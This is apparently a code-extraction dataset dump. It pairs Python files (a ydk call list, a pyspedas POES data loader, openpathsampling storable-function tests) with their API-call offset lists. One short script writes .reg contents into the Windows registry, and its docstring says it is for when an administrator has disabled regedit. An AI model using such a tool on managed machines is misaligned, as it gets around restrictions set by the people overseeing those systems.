YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71886, 71930), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""power-state-enter-reason"""'], {}), "(YType.str, 'power-state-enter-reason')\n", (71891, 71930), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((42402, 42417), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (42413, 42417), False, 'from collections import OrderedDict\n'), ((27275, 27299), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""name"""'], {}), "(YType.str, 'name')\n", (27280, 27299), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((27381, 27412), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""value-brief"""'], {}), "(YType.str, 'value-brief')\n", (27386, 27412), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((56698, 56742), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""field-validity-bitmap"""'], {}), "(YType.uint32, 'field-validity-bitmap')\n", (56703, 56742), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((56835, 56873), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""device-description"""'], {}), "(YType.str, 'device-description')\n", (56840, 56873), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((56953, 56978), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""units"""'], {}), "(YType.str, 'units')\n", (56958, 56978), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57062, 57094), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""device-id"""'], {}), "(YType.uint32, 'device-id')\n", (57067, 57094), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57174, 57202), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""value"""'], {}), "(YType.uint32, 'value')\n", (57179, 57202), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57287, 57320), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""alarm-type"""'], {}), "(YType.uint32, 'alarm-type')\n", (57292, 57320), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57404, 57436), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""data-type"""'], {}), "(YType.uint32, 'data-type')\n", (57409, 57436), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57516, 57544), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""scale"""'], {}), "(YType.uint32, 'scale')\n", (57521, 57544), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57628, 57660), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""precision"""'], {}), "(YType.uint32, 'precision')\n", (57633, 57660), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57741, 57770), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""status"""'], {}), "(YType.uint32, 'status')\n", (57746, 57770), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57859, 57896), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""age-time-stamp"""'], {}), "(YType.uint32, 'age-time-stamp')\n", (57864, 57896), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((57982, 58016), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""update-rate"""'], {}), "(YType.uint32, 'update-rate')\n", (57987, 58016), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((58098, 58127), 'ydk.types.YLeaf', 'YLeaf', (['YType.int32', '"""average"""'], {}), "(YType.int32, 'average')\n", (58103, 58127), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((58209, 58238), 'ydk.types.YLeaf', 'YLeaf', (['YType.int32', '"""minimum"""'], {}), "(YType.int32, 'minimum')\n", (58214, 58238), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((58320, 58349), 'ydk.types.YLeaf', 'YLeaf', (['YType.int32', '"""maximum"""'], {}), "(YType.int32, 'maximum')\n", (58325, 58349), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((58432, 58462), 'ydk.types.YLeaf', 'YLeaf', (['YType.int32', '"""interval"""'], {}), "(YType.int32, 'interval')\n", (58437, 58462), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((36085, 36109), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""type"""'], {}), "(YType.str, 'type')\n", (36090, 36109), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((36192, 36220), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""trap"""'], {}), "(YType.boolean, 'trap')\n", (36197, 36220), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((36311, 36342), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""value-brief"""'], {}), "(YType.str, 'value-brief')\n", (36316, 36342), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((42594, 42635), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""threshold-severity"""'], {}), "(YType.uint32, 'threshold-severity')\n", (42599, 42635), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((42736, 42777), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""threshold-relation"""'], {}), "(YType.uint32, 'threshold-relation')\n", (42741, 42777), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((42875, 42913), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""threshold-value"""'], {}), "(YType.uint32, 'threshold-value')\n", (42880, 42913), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((43016, 43060), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""threshold-evaluation"""'], {}), "(YType.boolean, 'threshold-evaluation')\n", (43021, 43060), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((43174, 43228), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""threshold-notification-enabled"""'], {}), "(YType.boolean, 'threshold-notification-enabled')\n", (43179, 43228), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n')]
|
"""
Hacky way to load a .reg file into the registry when regedit.exe has been disabled by the administrator
Probably very fragile!
"""
import sys
import winreg
def load_reg(input_file):
lines = open(input_file, encoding='utf-16-le').read().splitlines()
hkey = None
for line in lines:
if line.startswith('[HKEY'):
hkey = line[1:-1]
toplevel, sub_key = hkey.split('\\', maxsplit=1)
top = getattr(winreg, toplevel)
hkey = winreg.CreateKey(top, sub_key)
print(f'inkey: {hkey}')
continue
if hkey is None:
continue
# Parse and load
name, value = line.split('=')
name = name.replace('"', '')
value = value.replace('"', '')
winreg.SetValueEx(hkey, name, 0, winreg.REG_SZ, value)
if __name__ == '__main__':
filename = sys.argv[1]
load_reg(filename)
|
[
"winreg.CreateKey",
"winreg.SetValueEx"
] |
[((774, 828), 'winreg.SetValueEx', 'winreg.SetValueEx', (['hkey', 'name', '(0)', 'winreg.REG_SZ', 'value'], {}), '(hkey, name, 0, winreg.REG_SZ, value)\n', (791, 828), False, 'import winreg\n'), ((493, 523), 'winreg.CreateKey', 'winreg.CreateKey', (['top', 'sub_key'], {}), '(top, sub_key)\n', (509, 523), False, 'import winreg\n')]
|
import os
from pyspedas.utilities.dailynames import dailynames
from pyspedas.utilities.download import download
from pyspedas.analysis.time_clip import time_clip as tclip
from pytplot import cdf_to_tplot
from .config import CONFIG
def load(trange=['2018-11-5', '2018-11-6'],
probe=['noaa19'],
instrument='sem',
datatype='*',
suffix='',
get_support_data=False,
varformat=None,
downloadonly=False,
notplot=False,
no_update=False,
time_clip=False):
"""
This function loads POES Space Environment Monitor data. This function is
not meant to be called directly; instead, see the wrapper:
pyspedas.poes.sem
"""
if not isinstance(probe, list):
probe = [probe]
out_files = []
for prb in probe:
if instrument == 'sem':
pathformat = prb + '/sem2_fluxes-2sec/%Y/' + prb + '_poes-sem2_fluxes-2sec_%Y%m%d_v??.cdf'
# find the full remote path names using the trange
remote_names = dailynames(file_format=pathformat, trange=trange)
for remote_file in remote_names:
files = download(remote_file=remote_file, remote_path=CONFIG['remote_data_dir'], local_path=CONFIG['local_data_dir'], no_download=no_update)
if files is not None:
for file in files:
out_files.append(file)
out_files = sorted(out_files)
if downloadonly:
return out_files
tvars = cdf_to_tplot(out_files, suffix=suffix, merge=True, get_support_data=get_support_data, varformat=varformat, notplot=notplot)
if notplot:
return tvars
if time_clip:
for new_var in tvars:
tclip(new_var, trange[0], trange[1], suffix='')
return tvars
|
[
"pyspedas.analysis.time_clip.time_clip",
"pytplot.cdf_to_tplot",
"pyspedas.utilities.dailynames.dailynames",
"pyspedas.utilities.download.download"
] |
[((1505, 1633), 'pytplot.cdf_to_tplot', 'cdf_to_tplot', (['out_files'], {'suffix': 'suffix', 'merge': '(True)', 'get_support_data': 'get_support_data', 'varformat': 'varformat', 'notplot': 'notplot'}), '(out_files, suffix=suffix, merge=True, get_support_data=\n get_support_data, varformat=varformat, notplot=notplot)\n', (1517, 1633), False, 'from pytplot import cdf_to_tplot\n'), ((1053, 1102), 'pyspedas.utilities.dailynames.dailynames', 'dailynames', ([], {'file_format': 'pathformat', 'trange': 'trange'}), '(file_format=pathformat, trange=trange)\n', (1063, 1102), False, 'from pyspedas.utilities.dailynames import dailynames\n'), ((1165, 1301), 'pyspedas.utilities.download.download', 'download', ([], {'remote_file': 'remote_file', 'remote_path': "CONFIG['remote_data_dir']", 'local_path': "CONFIG['local_data_dir']", 'no_download': 'no_update'}), "(remote_file=remote_file, remote_path=CONFIG['remote_data_dir'],\n local_path=CONFIG['local_data_dir'], no_download=no_update)\n", (1173, 1301), False, 'from pyspedas.utilities.download import download\n'), ((1728, 1775), 'pyspedas.analysis.time_clip.time_clip', 'tclip', (['new_var', 'trange[0]', 'trange[1]'], {'suffix': '""""""'}), "(new_var, trange[0], trange[1], suffix='')\n", (1733, 1775), True, 'from pyspedas.analysis.time_clip import time_clip as tclip\n')]
|
import pytest
try:
from unittest import mock
except ImportError:
import mock
from collections import defaultdict, Counter
import itertools
import numpy as np
from openpathsampling.tests.test_helpers import make_1d_traj
from .serialization_helpers import get_uuid, set_uuid
from .storable_functions import *
_MODULE = "openpathsampling.experimental.simstore.storable_functions"
class MockBackend(object):
def __init__(self):
self.storable_function_tables = defaultdict(dict)
self.called_register = defaultdict(int)
self.called_load = defaultdict(int)
def has_table(self, table_name):
return table_name in self.storable_function_tables
def register_storable_function(self, table_name, result_type):
self.storable_function_tables[table_name] = {}
self.called_register[table_name] += 1
def load_storable_function_results(self, func_uuid, uuids):
table = self.storable_function_tables[func_uuid]
found_uuids = [uuid for uuid in uuids if uuid in table]
for uuid in uuids:
self.called_load[uuid] += 1
return {uuid: table[uuid] for uuid in found_uuids}
def add_storable_function_results(self, table_name, result_dict):
self.storable_function_tables[table_name].update(result_dict)
def test_requires_lists_pre():
assert requires_lists_pre([1]) == [[1]]
assert requires_lists_pre([1,2]) == [[1,2]]
@pytest.mark.parametrize('array_input,expected', [
([[1], [2], [3]], [1, 2, 3]),
([1, 2, 3], [1, 2, 3]),
([[1, 2], [3, 4]], [[1, 2], [3, 4]]),
([[[1, 2]], [[3, 4]]], [[1, 2], [3, 4]]),
])
def test_scalarize_singletons(array_input, expected):
np.testing.assert_array_equal(
scalarize_singletons(np.array(array_input)),
np.array(expected)
)
def test_scalarize_singletons_to_float():
arr = np.array([1.0])
arr.shape = tuple()
scalarized = scalarize_singletons(arr)
assert not isinstance(scalarized, np.ndarray)
assert isinstance(scalarized, float)
def test_wrap_numpy():
for inp in [1, [1, 2]]:
assert isinstance(wrap_numpy(inp), np.ndarray)
class TestStorableFunctionConfig(object):
def setup(self):
self.config = StorableFunctionConfig(processors=[
scalarize_singletons,
wrap_numpy,
requires_lists_pre,
requires_lists_post
])
@staticmethod
def func(values):
return np.array([s.xyz[:,0] for s in values])
def test_register(self):
assert len(self.config.processors) == 4
names = ['scalarize_singletons', 'requires_lists_pre',
'requires_lists_post', 'wrap_numpy']
for key in names:
assert key in self.config.processor_dict
assert self.config.item_preprocessors == []
assert self.config.list_preprocessors == [requires_lists_pre]
assert self.config.item_postprocessors == [scalarize_singletons]
assert self.config.list_postprocessors == [wrap_numpy,
requires_lists_post]
mock_wrap_numpy = Processor(name='wrap_numpy',
stage='item-pre',
func=lambda x: x)
self.config.register(mock_wrap_numpy)
proc_dict_wrap_numpy = self.config.processor_dict['wrap_numpy']
assert len(self.config.processors) == 4
assert proc_dict_wrap_numpy is mock_wrap_numpy
assert proc_dict_wrap_numpy is not wrap_numpy
assert mock_wrap_numpy in self.config.processors
assert wrap_numpy not in self.config.processors
assert self.config.item_preprocessors == [mock_wrap_numpy]
assert self.config.list_preprocessors == [requires_lists_pre]
assert self.config.item_postprocessors == [scalarize_singletons]
assert self.config.list_postprocessors == [requires_lists_post]
@pytest.mark.parametrize('style', ['obj', 'name'])
def test_deregister(self, style):
dereg = {'obj': wrap_numpy, 'name': 'wrap_numpy'}[style]
assert len(self.config.processors) == 4
self.config.deregister(dereg)
assert len(self.config.processors) == 3
assert 'wrap_numpy' not in self.config.processor_dict
assert wrap_numpy not in self.config.processors
def test_deregister_error(self):
with pytest.raises(KeyError):
self.config.deregister('foo')
def test_deregister_no_error(self):
# just run it to ensure it doesn't error out
self.config.deregister('foo', error_if_missing=False)
def test_func(self):
# test of the internally used test func
snap = make_1d_traj([5.0])[0]
assert self.func([snap]) == [[5]]
def test_list_preprocess(self):
snap = make_1d_traj([5.0])[0]
assert self.config.list_preprocess([snap]) == [[snap]]
def test_item_preprocess(self):
snap = make_1d_traj([5.0])[0]
assert self.config.item_preprocess(snap) == snap
def test_item_postprocess(self):
np.testing.assert_array_equal(
self.config.item_postprocess(np.array([[5.0]])),
np.array([5.0])
)
def test_list_postprocess(self):
snap = make_1d_traj([5.0])[0]
values = self.func([snap])
np.testing.assert_array_equal(self.config.list_postprocess(values),
np.array([5.0]))
def test_storable_function_integration(self):
snap = make_1d_traj([5.0])[0]
sf = StorableFunction(self.func, func_config=self.config)
assert sf(snap) == 5.0
np.testing.assert_array_equal(sf([snap]), np.array([5.0]))
class TestStorableFunctionResults(object):
def setup(self):
self.cv = StorableFunction(lambda x: x)
self.cv.__uuid__ = "funcUUID"
self.mapping = {'UUID1': "foo",
'UUID2': "bar"}
self.sfr = StorableFunctionResults(self.cv, "funcUUID")
self.sfr.result_dict = self.mapping
self.sfr.local_uuids = set(self.mapping.keys())
def test_get_results_as_dict_cached(self):
result, missing = self.sfr.get_results_as_dict({'UUID1': "object"})
assert result == {'UUID1': "foo"}
assert missing == {}
def test_get_results_as_dict_missing(self):
result, missing = self.sfr.get_results_as_dict({"UUID3": "object"})
assert result == {}
assert missing == {"UUID3": "object"}
def test_get_results_as_dict_storage(self):
pytest.skip()
pass
def test_update(self):
new_sfr = StorableFunctionResults(self.cv, "funcUUID")
new_sfr.result_dict = {'UUID3': "baz"}
new_sfr.local_uuids = set(['UUID3'])
self.sfr.update(new_sfr)
assert len(self.sfr) == 3
assert "UUID3" in self.sfr.local_uuids
assert self.sfr.result_dict["UUID3"] == "baz"
# TODO: test_cache_results_nonpure_function
# if you try to cache results that don't match the original, you get an
# error
def test_cache_results(self):
self.sfr.cache_results({"UUID3": "baz"})
assert len(self.sfr) == 3
assert "UUID3" in self.sfr.local_uuids
assert self.sfr.result_dict["UUID3"] == "baz"
def test_clear(self):
assert len(self.sfr) != 0
self.sfr.clear()
assert len(self.sfr) == 0
assert self.sfr.result_dict == {}
assert self.sfr.local_uuids == set([])
def test_len(self):
assert len(self.sfr) == 2
def test_to_dict_from_dict_cycle(self):
pass
@mock.patch(_MODULE + '.get_uuid', lambda x: x)
@mock.patch(_MODULE + '.has_uuid', lambda x: isinstance(x, str))
class TestStorableFunction(object):
def setup(self):
def get_expected(uuid):
expected = {'uuid': 'eval', 'uuid1': 'other'}
return expected[uuid]
self.func = StorableFunction(get_expected)
@pytest.mark.parametrize('min_max', [(None, None), (None, 10), (0, 10)])
def test_check_periodic(self, min_max):
period_min, period_max = min_max
n_nones = Counter(min_max)[None]
expected = {2: False, 0: True, 1: 'error'}[n_nones]
check_period = StorableFunction._check_period
if expected == 'error':
with pytest.raises(ValueError, match='period'):
check_period(period_min, period_max)
else:
assert check_period(period_min, period_max) == expected
def test_is_periodic(self):
assert not self.func.is_periodic
func = StorableFunction(lambda s: s.xyz[0][0], period_min=0.0,
period_max=1.0)
assert func.is_periodic
def test_gets_source(self):
pytest.skip()
pass
def test_no_source_warning(self):
pytest.skip()
pass
def test_disk_cache_property(self):
pytest.skip()
pass
@pytest.mark.parametrize('mode', ['no-caching', 'analysis',
'production'])
def test_mode(self, mode):
self.func.mode = mode
assert self.func.mode == mode
if mode == 'no-caching':
assert self.func.local_cache is None
else:
assert self.func.local_cache is not None
def test_bad_mode(self):
with pytest.raises(ValueError):
self.func.mode = 'foo'
@staticmethod
def _set_cache(func, mode, found_in, expected):
if found_in == 'cache':
func.local_cache.cache_results(expected)
elif mode == 'no-caching':
pass
else:
func.local_cache.clear()
@staticmethod
def _set_storage(func, mode, found_in, expected):
if found_in == 'storage':
def get_storage(cv_uuid, uuids):
missing = {uuid: uuids[uuid] for uuid in uuids
if uuid not in expected.keys()}
found = {uuid: uuids[uuid] for uuid in uuids
if uuid in expected.keys()}
return {uuid: expected[uuid] for uuid in found}, missing
else:
def get_storage(cv_uuid, uuids):
return {}, dict(uuids)
storage = mock.MagicMock(get_function_results=get_storage)
func._handlers.add(storage)
@pytest.mark.parametrize('mode, found_in', [
('analysis', 'storage'), ('analysis', 'cache'),
('analysis', 'eval'), ('production', 'cache'),
('production', 'eval'), ('no-caching', 'eval')
])
def test_call(self, mode, found_in):
# mode = 'analysis'
# found_in = 'cache'
# setup, depending on the parametrized parameters
expected = {'uuid': 'eval'}
get_expected = lambda x: expected[x]
func = StorableFunction(get_expected)
func.mode = mode
self._set_cache(func, mode, found_in, expected={'uuid': 'cache'})
self._set_storage(func, mode, found_in, expected={'uuid': 'storage'})
# validation of correct behavior
# NOTE: some of this testing is based on internal behavior, which
# perhaps shouldn't be in the public-facing API
if found_in != 'cache' and mode != 'no-caching':
assert 'uuid' not in func.local_cache.result_dict
assert func('uuid') == found_in
if mode != 'no-caching':
assert func.local_cache.result_dict['uuid'] == found_in
@pytest.mark.parametrize("found_in_1, found_in_2", [
('storage', 'storage'), ('cache', 'cache'), ('eval', 'eval'),
('cache', 'eval')
])
def test_call_multiple(self, found_in_1, found_in_2):
# only test this in analysis
expected_dict = {'uuid': found_in_1, 'other': found_in_2}
expected = {
level: {uuid: expected
for uuid, expected in expected_dict.items()
if expected == level}
for level in ['eval', 'cache', 'storage']
}
get_expected = lambda x: expected['eval'][x]
func = StorableFunction(get_expected)
self._set_cache(func, 'analysis', 'cache',
expected=expected['cache'])
self._set_storage(func, 'analysis', 'storage',
expected=expected['storage'])
assert func(['uuid', 'other']) == [found_in_1, found_in_2]
def test_to_dict_from_dict_cycle(self):
pytest.skip()
pass
def test_full_serialization_cycle(self):
pytest.skip()
pass
@pytest.mark.parametrize('found_in', ['cache', 'storage', 'eval'])
def test_analysis_mode_integration(self, found_in):
pytest.skip()
pass
class TestStorageFunctionHandler(object):
def setup(self):
self.backend = MockBackend()
self.storage = mock.NonCallableMock(backend=self.backend)
self.sf_handler = StorageFunctionHandler(self.storage)
self.func = StorableFunction(lambda x: x.xyz[0][0])
self.f2 = StorableFunction.from_dict(self.func.to_dict())
set_uuid(self.f2, get_uuid(self.func))
self.result_dict = {'snap1': 5.0, 'snap2': 3.0}
@staticmethod
def _make_sfr(func, result_dict):
sfr = StorableFunctionResults(func, get_uuid(func))
sfr.cache_results(result_dict)
return sfr
def test_codec_settings(self):
# TODO: is this actually used?
pytest.skip()
@pytest.mark.parametrize('has_table, with_result',
itertools.product([True, False],
[True, False]))
def test_register_function(self, has_table, with_result):
uuid = get_uuid(self.func)
if has_table:
self.storage.backend.storable_function_tables[uuid] = {}
example = 1.0 if with_result else None
unable_to_register = example is None and not has_table
add_table = not has_table and not unable_to_register
assert not self.func.has_handler
assert len(self.sf_handler.all_functions) == 0
assert self.sf_handler.functions == []
self.sf_handler.register_function(self.func, example)
sf_tables = self.backend.storable_function_tables
if not unable_to_register:
assert uuid in sf_tables
else:
assert uuid not in sf_tables
assert self.func is self.sf_handler.canonical_functions[uuid]
assert self.sf_handler.all_functions[uuid] == [self.func]
if not unable_to_register:
assert self.func.has_handler
assert self.func._handlers == {self.sf_handler}
assert self.sf_handler.functions == [self.func]
# make a copy of the func
assert get_uuid(self.f2) == get_uuid(self.func)
assert self.f2 is not self.func
# internal checks should ensure that you call add_table False here
expected_calls = {True: 1, False: 0}[add_table]
assert self.backend.called_register[uuid] == expected_calls
self.sf_handler.register_function(self.f2, example)
assert self.sf_handler.canonical_functions[uuid] is not self.f2
assert self.sf_handler.canonical_functions[uuid] is self.func
assert self.sf_handler.all_functions[uuid] == [self.func, self.f2]
assert self.backend.called_register[uuid] == expected_calls
assert self.sf_handler.functions == [self.func]
def test_update_cache(self):
self.sf_handler.register_function(self.func)
item1, item2 = self.result_dict.items()
sfr1 = self._make_sfr(self.func, dict([item1]))
sfr2 = self._make_sfr(self.f2, dict([item2]))
assert self.func.local_cache.result_dict == {}
self.sf_handler.update_cache(sfr1)
assert self.func.local_cache.result_dict == {'snap1': 5.0}
# register a new function; models the parallel update
self.sf_handler.update_cache(sfr2)
assert self.func.local_cache.result_dict == self.result_dict
def test_clear_non_canonical(self):
sf_handler = self.sf_handler
uuid = get_uuid(self.func)
sf_handler.register_function(self.func)
sf_handler.register_function(self.f2)
assert sf_handler.canonical_functions[uuid] == self.func
assert sf_handler.all_functions[uuid] == [self.func, self.f2]
sf_handler.clear_non_canonical()
assert sf_handler.canonical_functions[uuid] == self.func
assert sf_handler.all_functions[uuid] == [self.func]
@pytest.mark.parametrize('inputs', [['snap1'], ['snap1', 'snap2']])
def test_get_function_results(self, inputs):
sf_handler = self.sf_handler
sf_handler.register_function(self.func)
uuid = get_uuid(self.func)
registered_values = {uuid: value
for uuid, value in self.result_dict.items()
if uuid in inputs}
self.backend.add_storable_function_results(
table_name=get_uuid(self.func),
result_dict=registered_values
)
uuid_items = {'snap1': "This is snap1",
'snap2': "This is snap2"}
expected_found = {uuid: self.result_dict[uuid] for uuid in inputs}
missing_uuids = [uuid for uuid in uuid_items.keys()
if uuid not in registered_values]
expected_missing = {uuid: uuid_items[uuid]
for uuid in missing_uuids}
found, missing = sf_handler.get_function_results(uuid, uuid_items)
assert found == expected_found
assert missing == expected_missing
|
[
"collections.Counter",
"pytest.skip",
"mock.patch",
"collections.defaultdict",
"mock.NonCallableMock",
"pytest.raises",
"numpy.array",
"itertools.product",
"pytest.mark.parametrize",
"mock.MagicMock",
"openpathsampling.tests.test_helpers.make_1d_traj"
] |
[((1438, 1630), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""array_input,expected"""', '[([[1], [2], [3]], [1, 2, 3]), ([1, 2, 3], [1, 2, 3]), ([[1, 2], [3, 4]], [\n [1, 2], [3, 4]]), ([[[1, 2]], [[3, 4]]], [[1, 2], [3, 4]])]'], {}), "('array_input,expected', [([[1], [2], [3]], [1, 2, 3\n ]), ([1, 2, 3], [1, 2, 3]), ([[1, 2], [3, 4]], [[1, 2], [3, 4]]), ([[[1,\n 2]], [[3, 4]]], [[1, 2], [3, 4]])])\n", (1461, 1630), False, 'import pytest\n'), ((7628, 7674), 'mock.patch', 'mock.patch', (["(_MODULE + '.get_uuid')", '(lambda x: x)'], {}), "(_MODULE + '.get_uuid', lambda x: x)\n", (7638, 7674), False, 'import mock\n'), ((1869, 1884), 'numpy.array', 'np.array', (['[1.0]'], {}), '([1.0])\n', (1877, 1884), True, 'import numpy as np\n'), ((3944, 3993), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""style"""', "['obj', 'name']"], {}), "('style', ['obj', 'name'])\n", (3967, 3993), False, 'import pytest\n'), ((7979, 8050), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""min_max"""', '[(None, None), (None, 10), (0, 10)]'], {}), "('min_max', [(None, None), (None, 10), (0, 10)])\n", (8002, 8050), False, 'import pytest\n'), ((8967, 9040), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""mode"""', "['no-caching', 'analysis', 'production']"], {}), "('mode', ['no-caching', 'analysis', 'production'])\n", (8990, 9040), False, 'import pytest\n'), ((10361, 10557), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""mode, found_in"""', "[('analysis', 'storage'), ('analysis', 'cache'), ('analysis', 'eval'), (\n 'production', 'cache'), ('production', 'eval'), ('no-caching', 'eval')]"], {}), "('mode, found_in', [('analysis', 'storage'), (\n 'analysis', 'cache'), ('analysis', 'eval'), ('production', 'cache'), (\n 'production', 'eval'), ('no-caching', 'eval')])\n", (10384, 10557), False, 'import pytest\n'), ((11478, 11614), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""found_in_1, found_in_2"""', "[('storage', 'storage'), ('cache', 'cache'), ('eval', 'eval'), ('cache',\n 'eval')]"], {}), "('found_in_1, found_in_2', [('storage', 'storage'),\n ('cache', 'cache'), ('eval', 'eval'), ('cache', 'eval')])\n", (11501, 11614), False, 'import pytest\n'), ((12568, 12633), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""found_in"""', "['cache', 'storage', 'eval']"], {}), "('found_in', ['cache', 'storage', 'eval'])\n", (12591, 12633), False, 'import pytest\n'), ((16555, 16621), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""inputs"""', "[['snap1'], ['snap1', 'snap2']]"], {}), "('inputs', [['snap1'], ['snap1', 'snap2']])\n", (16578, 16621), False, 'import pytest\n'), ((482, 499), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (493, 499), False, 'from collections import defaultdict, Counter\n'), ((531, 547), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (542, 547), False, 'from collections import defaultdict, Counter\n'), ((575, 591), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (586, 591), False, 'from collections import defaultdict, Counter\n'), ((1791, 1809), 'numpy.array', 'np.array', (['expected'], {}), '(expected)\n', (1799, 1809), True, 'import numpy as np\n'), ((2461, 2500), 'numpy.array', 'np.array', (['[s.xyz[:, 0] for s in values]'], {}), '([s.xyz[:, 0] for s in values])\n', (2469, 2500), True, 'import numpy as np\n'), ((6565, 6578), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (6576, 6578), False, 'import pytest\n'), ((8784, 8797), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (8795, 8797), False, 'import pytest\n'), ((8858, 8871), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (8869, 8871), False, 'import pytest\n'), ((8934, 8947), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (8945, 8947), False, 'import pytest\n'), ((10270, 10318), 'mock.MagicMock', 'mock.MagicMock', ([], {'get_function_results': 'get_storage'}), '(get_function_results=get_storage)\n', (10284, 10318), False, 'import mock\n'), ((12454, 12467), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (12465, 12467), False, 'import pytest\n'), ((12535, 12548), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (12546, 12548), False, 'import pytest\n'), ((12698, 12711), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (12709, 12711), False, 'import pytest\n'), ((12850, 12892), 'mock.NonCallableMock', 'mock.NonCallableMock', ([], {'backend': 'self.backend'}), '(backend=self.backend)\n', (12870, 12892), 